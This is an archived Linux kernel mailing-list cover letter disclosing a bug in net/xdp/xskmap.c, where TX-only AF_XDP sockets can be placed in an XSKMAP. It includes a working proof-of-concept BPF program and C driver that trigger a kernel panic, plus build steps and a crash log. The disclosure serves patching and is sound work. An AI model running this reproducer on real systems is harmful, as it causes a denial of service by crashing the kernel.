All of lore.kernel.org
 help / color / mirror / Atom feed
From: Linpu Yu <linpu5433@gmail.com>
To: magnus.karlsson@intel.com, maciej.fijalkowski@intel.com,
	netdev@vger.kernel.org, bpf@vger.kernel.org
Cc: sdf@fomichev.me, davem@davemloft.net, edumazet@google.com,
	kuba@kernel.org, pabeni@redhat.com, horms@kernel.org,
	ast@kernel.org, daniel@iogearbox.net, hawk@kernel.org,
	john.fastabend@gmail.com, bjorn@kernel.org,
	linux-kernel@vger.kernel.org, yuantan098@gmail.com,
	yifanwucs@gmail.com
Subject: [PATCH 0/1] xskmap: reject TX-only AF_XDP sockets
Date: Mon, 30 Mar 2026 03:29:41 +0800	[thread overview]
Message-ID: <cover.1774701288.git.linpu5433@gmail.com> (raw)

Hi,

We found and validated a low-severity security issue in
net/xdp/xskmap.c, present from v4.18-rc1 through v7.0-rc4. The bug can
cause a KASAN report and panic when an XDP program redirects a packet
to an XSKMAP entry backed by a TX-only AF_XDP socket. We have also
included a minimal reproducer, which was tested on v7.0.0-rc4.

We will send a patch as a follow-up in this thread. We've tested
it, and it should not affect any other functionality.

---- details below ----

Bug details:
xsk_map_update_elem() accepts any PF_XDP socket and does not
require an Rx ring. A TX-only AF_XDP socket can therefore be
inserted into an XSKMAP.

When an XDP program redirects a packet through such an entry, the
packet always enters the Rx path. The generic receive path reaches
xsk_generic_rcv(), which assumes xs->rx is valid and dereferences
it. With a TX-only socket, xs->rx is NULL and the kernel reports a
KASAN null-ptr-deref before panicking.

The root cause is that XSKMAP publication validates only the socket
family, but redirect delivery requires an Rx-capable AF_XDP socket.

Required kernel config:
CONFIG_BPF
CONFIG_BPF_SYSCALL
CONFIG_XDP_SOCKETS
CONFIG_VETH

Reproducer:
    clang -O2 -g -target bpf -D__TARGET_ARCH_x86 -I/usr/include/x86_64-linux-gnu -c -o poc.bpf.o poc.bpf.c
    gcc -O2 -g -Wall -Wextra -o poc poc.c -lbpf -lelf -lz
    sudo ./poc ./poc.bpf.o

We have validated the PoC on v7.0.0-rc4 and v6.12.74.

---8<--- BEGIN poc.bpf.c ---8<---
// SPDX-License-Identifier: GPL-2.0
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

/*
 * XSKMAP with a single slot, named "xsks" in the object file.
 * redirect_to_xsk() below redirects through key 0 of this map; the
 * user-space side (poc.c) looks the map up by name and installs its
 * AF_XDP socket with xsk_socket__update_xskmap().
 */
struct {
	__uint(type, BPF_MAP_TYPE_XSKMAP);
	__uint(max_entries, 1);		/* only one slot is ever used */
	__type(key, __u32);
	__type(value, __u32);
} xsks SEC(".maps");

/*
 * XDP entry point: unconditionally redirect every packet through slot 0
 * of the xsks map. The packet contents (ctx) are never inspected.
 *
 * XDP_PASS in the flags argument is, per the bpf_redirect_map() helper
 * documentation, the action returned when the map lookup fails.
 */
SEC("xdp")
int redirect_to_xsk(struct xdp_md *ctx)
{
	const __u32 slot = 0;	/* the map's single entry */

	return bpf_redirect_map(&xsks, slot, XDP_PASS);
}

/* License string placed in the "license" section of the object. */
char _license[] SEC("license") = "GPL";
---8<--- END poc.bpf.c ---8<---

---8<--- BEGIN poc.c ---8<---
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE

#include <errno.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_link.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include <bpf/xsk.h>

/* veth end that gets the XDP program and the AF_XDP socket (see main()). */
#define RX_IFACE "vethxdp0"
/* Peer veth end; the test frame is sent out through this interface. */
#define TX_IFACE "vethxdp1"
/* Queue index the AF_XDP socket is created on. */
#define QUEUE_ID 0
/* Ring size used for both rx_size and tx_size in the socket config. */
#define NUM_DESCS 64
/* UMEM geometry: NUM_FRAMES frames of FRAME_SIZE bytes each. */
#define FRAME_SIZE XSK_UMEM__DEFAULT_FRAME_SIZE
#define NUM_FRAMES 16
#define UMEM_SIZE ((size_t)FRAME_SIZE * NUM_FRAMES)

/*
 * MAC addresses written into the test frame. They match the addresses
 * setup_links() assigns to RX_IFACE (…:01) and TX_IFACE (…:02).
 */
static const unsigned char rx_mac[ETH_ALEN] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x01};
static const unsigned char tx_mac[ETH_ALEN] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x02};

/*
 * Format a shell command printf-style and run it through system().
 *
 * Returns 0 on success. Returns -1 without executing anything when the
 * command cannot be formatted or does not fit in the local buffer.
 * Otherwise returns the non-zero value reported by system(), after
 * logging the failing command to stderr.
 */
static int run_cmd(const char *fmt, ...)
{
	char cmd[512];
	va_list ap;
	int len;
	int rc;

	va_start(ap, fmt);
	len = vsnprintf(cmd, sizeof(cmd), fmt, ap);
	va_end(ap);

	/* Never hand a silently truncated command line to the shell. */
	if (len < 0 || (size_t)len >= sizeof(cmd)) {
		fprintf(stderr, "command too long or malformed: %s\n", fmt);
		return -1;
	}

	rc = system(cmd);
	if (rc)
		fprintf(stderr, "command failed (%d): %s\n", rc, cmd);
	return rc;
}

static int cleanup_links(void)
{
	return system("ip link del " RX_IFACE " >/dev/null 2>&1");
}

static int setup_links(void)
{
	int rc;

	cleanup_links();

	rc = run_cmd("ip link add " RX_IFACE " type veth peer name " TX_IFACE);
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " RX_IFACE " address 02:00:00:00:00:01");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " TX_IFACE " address 02:00:00:00:00:02");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " RX_IFACE " up");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " TX_IFACE " up");
	if (rc)
		return -1;

	return 0;
}

static int send_test_frame(int ifindex)
{
	unsigned char frame[64];
	struct sockaddr_ll addr;
	struct ethhdr *eth = (struct ethhdr *)frame;
	int fd, ret;

	memset(frame, 0x41, sizeof(frame));
	memcpy(eth->h_dest, rx_mac, ETH_ALEN);
	memcpy(eth->h_source, tx_mac, ETH_ALEN);
	eth->h_proto = htons(ETH_P_IP);

	fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP));
	if (fd < 0) {
		perror("socket(AF_PACKET)");
		return -1;
	}

	memset(&addr, 0, sizeof(addr));
	addr.sll_family = AF_PACKET;
	addr.sll_protocol = htons(ETH_P_IP);
	addr.sll_ifindex = ifindex;
	addr.sll_halen = ETH_ALEN;
	memcpy(addr.sll_addr, rx_mac, ETH_ALEN);

	ret = sendto(fd, frame, sizeof(frame), 0,
		     (struct sockaddr *)&addr, sizeof(addr));
	if (ret < 0) {
		perror("sendto");
		close(fd);
		return -1;
	}

	close(fd);
	return 0;
}

/*
 * libbpf print callback: drop LIBBPF_DEBUG messages and forward every
 * other level to stderr. Returns 0 for dropped messages, otherwise the
 * result of vfprintf().
 */
static int libbpf_print_fn(enum libbpf_print_level level, const char *fmt, va_list args)
{
	if (level != LIBBPF_DEBUG)
		return vfprintf(stderr, fmt, args);

	return 0;
}

/*
 * Reproducer driver.
 *
 * Usage: poc [path-to-poc.bpf.o]   (defaults to ./poc.bpf.o)
 *
 * Steps: create a veth pair, create a UMEM and an AF_XDP socket on
 * RX_IFACE, load the BPF object, attach its XDP program to RX_IFACE in
 * SKB mode, insert the socket into the "xsks" map, then send one frame
 * out of TX_IFACE and wait two seconds.
 *
 * Returns 0 only when every step succeeded and the process survived the
 * wait; any failure yields a non-zero exit status. All resources that
 * were set up are torn down on the way out.
 */
int main(int argc, char **argv)
{
	struct xsk_ring_prod fill = {}, tx = {};
	struct xsk_ring_cons comp = {};
	struct xsk_socket_config xsk_cfg = {
		.rx_size = NUM_DESCS,
		.tx_size = NUM_DESCS,
		.libbpf_flags = XSK_LIBBPF_FLAGS__INHIBIT_PROG_LOAD,
		.xdp_flags = XDP_FLAGS_SKB_MODE,
		.bind_flags = XDP_COPY,
	};
	struct rlimit rlim = {
		.rlim_cur = RLIM_INFINITY,
		.rlim_max = RLIM_INFINITY,
	};
	struct xsk_umem *umem = NULL;
	struct xsk_socket *xsk = NULL;
	struct bpf_program *prog;
	struct bpf_object *obj = NULL;
	struct bpf_map *xsks_map;
	const char *bpf_path;
	void *umem_area = NULL;
	int rx_ifindex = -1, tx_ifindex = -1;
	int err = 1;

	if (argc > 2) {
		fprintf(stderr, "usage: %s [./poc.bpf.o]\n", argv[0]);
		return 1;
	}

	bpf_path = argc == 2 ? argv[1] : "./poc.bpf.o";

	libbpf_set_print(libbpf_print_fn);
	/* Best effort: the result is intentionally not checked. */
	setrlimit(RLIMIT_MEMLOCK, &rlim);

	if (setup_links()) {
		fprintf(stderr, "failed to create veth pair\n");
		goto out;
	}

	rx_ifindex = if_nametoindex(RX_IFACE);
	tx_ifindex = if_nametoindex(TX_IFACE);
	if (!rx_ifindex || !tx_ifindex) {
		fprintf(stderr, "if_nametoindex failed\n");
		goto out;
	}

	if (posix_memalign(&umem_area, getpagesize(), UMEM_SIZE)) {
		fprintf(stderr, "posix_memalign failed\n");
		goto out;
	}
	memset(umem_area, 0, UMEM_SIZE);

	err = xsk_umem__create(&umem, umem_area, UMEM_SIZE, &fill, &comp, NULL);
	if (err) {
		fprintf(stderr, "xsk_umem__create failed: %d\n", err);
		goto out;
	}

	/* The Rx ring argument is NULL: only a Tx ring is requested. */
	err = xsk_socket__create(&xsk, RX_IFACE, QUEUE_ID, umem, NULL, &tx, &xsk_cfg);
	if (err) {
		fprintf(stderr, "xsk_socket__create failed: %d\n", err);
		goto out;
	}

	obj = bpf_object__open_file(bpf_path, NULL);
	if (libbpf_get_error(obj)) {
		err = (int)libbpf_get_error(obj);
		obj = NULL;
		fprintf(stderr, "bpf_object__open_file failed: %d\n", err);
		goto out;
	}

	err = bpf_object__load(obj);
	if (err) {
		fprintf(stderr, "bpf_object__load failed: %d\n", err);
		goto out;
	}

	/*
	 * From here on err is 0 after each successful call, so failure
	 * paths that do not come with their own error code must set it
	 * explicitly; otherwise the process would exit with status 0.
	 */
	prog = bpf_object__find_program_by_name(obj, "redirect_to_xsk");
	if (!prog) {
		fprintf(stderr, "failed to find program\n");
		err = 1;
		goto out;
	}

	xsks_map = bpf_object__find_map_by_name(obj, "xsks");
	if (!xsks_map) {
		fprintf(stderr, "failed to find xsks map\n");
		err = 1;
		goto out;
	}

	err = bpf_set_link_xdp_fd(rx_ifindex, bpf_program__fd(prog), XDP_FLAGS_SKB_MODE);
	if (err) {
		fprintf(stderr, "bpf_set_link_xdp_fd attach failed: %d\n", err);
		goto out;
	}

	err = xsk_socket__update_xskmap(xsk, bpf_map__fd(xsks_map));
	if (err) {
		fprintf(stderr, "xsk_socket__update_xskmap failed: %d\n", err);
		goto out;
	}

	fprintf(stderr, "sending one frame into %s queue %d\n", RX_IFACE, QUEUE_ID);
	fflush(stderr);

	if (send_test_frame(tx_ifindex)) {
		err = 1;
		goto out;
	}

	/* Give the kernel time to process the frame before reporting. */
	sleep(2);
	fprintf(stderr, "no crash observed\n");
	err = 0;

out:
	/* Teardown: each step is guarded by whether its resource exists. */
	if (rx_ifindex > 0)
		bpf_set_link_xdp_fd(rx_ifindex, -1, XDP_FLAGS_SKB_MODE);
	if (xsk)
		xsk_socket__delete(xsk);
	if (umem)
		xsk_umem__delete(umem);
	free(umem_area);
	if (obj)
		bpf_object__close(obj);
	cleanup_links();
	return err;
}
---8<--- END poc.c ---8<---

Crash log:
[  628.881280][    C0] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN NOPTI
[  628.882528][    C0] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
[  628.883234][    C0] CPU: 0 UID: 0 PID: 10251 Comm: poc Not tainted 6.12.74 #3
[  628.883828][    C0] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  628.884701][    C0] RIP: 0010:xsk_generic_rcv+0x1c1/0x460
[  628.885258][    C0] Code: 48 c1 ea 03 80 3c 02 00 0f 85 a0 02 00 00 48 8b 9d 80 05 00 00 48 b8 00 00 00 00 00 fc ff df 48 8d 7b 08 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 09 3c 03 7f 05 e8 5e d6 ee f6 44 8b 73 08 48
[  628.886884][    C0] RSP: 0018:ffffc90000007738 EFLAGS: 00010212
[  628.887445][    C0] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffff88803fe40800
[  628.888062][    C0] RDX: 0000000000000001 RSI: ffffffff8b08bfc6 RDI: 0000000000000008
[  628.888699][    C0] RBP: ffff88803fe40800 R08: 0000000000000004 R09: 0000000000000000
[  628.889359][    C0] R10: 0000000000000000 R11: 0000000000000001 R12: 00000000fffffff4
[  628.889985][    C0] R13: ffff88803fe40da8 R14: 0000000000000040 R15: ffffc90000007e98
[  628.890669][    C0] FS:  00007f7fe6b52740(0000) GS:ffff88806a800000(0000) knlGS:0000000000000000
[  628.891406][    C0] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  628.891949][    C0] CR2: 00007f7fe6c9f350 CR3: 0000000031de6000 CR4: 0000000000750ef0
[  628.892613][    C0] PKRU: 55555554
[  628.892925][    C0] Call Trace:
[  628.893226][    C0]  <IRQ>
[  628.945597][    C0] Modules linked in:
[  628.946047][    C0] ---[ end trace 0000000000000000 ]---
[  628.946512][    C0] RIP: 0010:xsk_generic_rcv+0x1c1/0x460
[  628.954560][    C0] Kernel panic - not syncing: Fatal exception in interrupt
[  628.955982][    C0] Kernel Offset: disabled

Best regards
Linpu Yu


Linpu Yu (1):
  xskmap: reject TX-only AF_XDP sockets

 net/xdp/xskmap.c | 4 ++++
 1 file changed, 4 insertions(+)

-- 
2.53.0


             reply	other threads:[~2026-03-29 19:29 UTC|newest]

Thread overview: 6+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-03-29 19:29 Linpu Yu [this message]
2026-03-29 19:29 ` [PATCH 1/1] xskmap: reject TX-only AF_XDP sockets Linpu Yu
2026-03-30  2:22   ` Jason Xing
2026-03-30 13:50   ` Maciej Fijalkowski
2026-04-15  8:43   ` Jason Xing
2026-04-15 17:22     ` Yuan Tan

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=cover.1774701288.git.linpu5433@gmail.com \
    --to=linpu5433@gmail.com \
    --cc=ast@kernel.org \
    --cc=bjorn@kernel.org \
    --cc=bpf@vger.kernel.org \
    --cc=daniel@iogearbox.net \
    --cc=davem@davemloft.net \
    --cc=edumazet@google.com \
    --cc=hawk@kernel.org \
    --cc=horms@kernel.org \
    --cc=john.fastabend@gmail.com \
    --cc=kuba@kernel.org \
    --cc=linux-kernel@vger.kernel.org \
    --cc=maciej.fijalkowski@intel.com \
    --cc=magnus.karlsson@intel.com \
    --cc=netdev@vger.kernel.org \
    --cc=pabeni@redhat.com \
    --cc=sdf@fomichev.me \
    --cc=yifanwucs@gmail.com \
    --cc=yuantan098@gmail.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.